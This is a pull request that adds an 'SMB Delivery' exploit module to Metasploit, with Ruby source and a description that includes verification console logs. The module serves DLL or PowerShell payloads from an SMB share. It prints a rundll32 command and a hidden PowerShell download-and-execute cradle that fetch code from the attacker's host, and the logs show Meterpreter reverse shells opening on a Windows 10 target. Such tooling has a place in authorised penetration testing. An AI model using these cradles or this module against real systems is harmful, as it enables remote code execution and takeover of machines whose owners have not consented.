### PR TITLE
Addition of SMB delivery module

### DIFF
--- a/modules/exploits/windows/smb/smb_delivery.rb
+++ b/modules/exploits/windows/smb/smb_delivery.rb
@@ -1,0 +1,77 @@
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::SMB::Server::Share
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "SMB Delivery",
+      'Description'    => %q{
+        This module serves payloads via an SMB server and provides commands to retrieve
+        and execute the generated payloads. Currently supports DLLs and Powershell.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Andrew Smith',
+          'Russel Van Tuyl'
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3074']
+        ],
+      'Payload'        =>
+        {
+          'Space'       => 2048,
+          'DisableNops' => true
+        },
+        'Platform'       => 'win',
+        'Targets'        =>
+          [
+            ['DLL', {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X86_64]
+            }],
+            ['PSH', {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X86_64]
+            }]
+          ],
+        'Privileged'     => false,
+        'DisclosureDate' => "Jul 26 2016",
+        'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('FILE_NAME', [ false, 'DLL file name', 'test.dll'])
+      ], self.class)
+
+    deregister_options('FILE_CONTENTS')
+  end
+
+  def primer
+    print_status('Run the following command on the target machine:')
+    case target.name
+    when 'PSH'
+      self.file_contents = cmd_psh_payload(  payload.encoded,
+                                             payload_instance.arch.first,
+                                             remove_comspec: true,
+                                             use_single_quotes: true)
+
+      ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
+      download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(unc)
+      download_and_run = "#{ignore_cert}#{download_string}"
+      print_line generate_psh_command_line(  noprofile: true,
+                                             windowstyle: 'hidden',
+                                             command: download_and_run)
+    when 'DLL'
+      self.file_contents = generate_payload_dll
+      print_line("rundll32.exe #{unc},0")
+    end
+  end
+end


### PR DESCRIPTION
This PR adds the ability to deliver Metasploit payloads over SMB shares. The modules currently supports loading and executing code from a remote share in the form of a DLL or the PowerShell "download cradle". Similar to the web_delivery module just leverages SMB for more MSF payload fun.
## Verification

**DLL Method**

```
msf > use exploit/smb_delivery 
msf exploit(smb_delivery) > set srvhost 192.168.1.72
srvhost => 192.168.1.72
msf exploit(smb_delivery) > exploit
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.1.72:4444 
[*] Server started.
[*] Run the following command on the target machine:
rundll32.exe \\192.168.1.72\uaTRx\test.dll,0
msf exploit(smb_delivery) > [*] Sending stage (957999 bytes) to 192.168.1.64
[*] Meterpreter session 1 opened (192.168.1.72:4444 -> 192.168.1.64:3732) at 2016-07-29 15:04:44 -0400
sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : ORLY
OS              : Windows 10 (Build 10586).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > 
```

**Powershell Method**

```
msf > use exploit/smb_delivery 
msf exploit(smb_delivery) > set target 1
target => 1
msf exploit(smb_delivery) > set srvhost 192.168.1.72
srvhost => 192.168.1.72
msf exploit(smb_delivery) > exploit
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.1.72:4444 
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $P=new-object net.webclient;$P.proxy=[Net.WebRequest]::GetSystemWebProxy();$P.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $P.downloadstring('\\192.168.1.72\rZGLOZ\test.dll');
msf exploit(smb_delivery) > [*] Sending stage (957999 bytes) to 192.168.1.64
[*] Meterpreter session 2 opened (192.168.1.72:4444 -> 192.168.1.64:3735) at 2016-07-29 15:06:14 -0400
sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : ORLY
OS              : Windows 10 (Build 10586).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > 
```
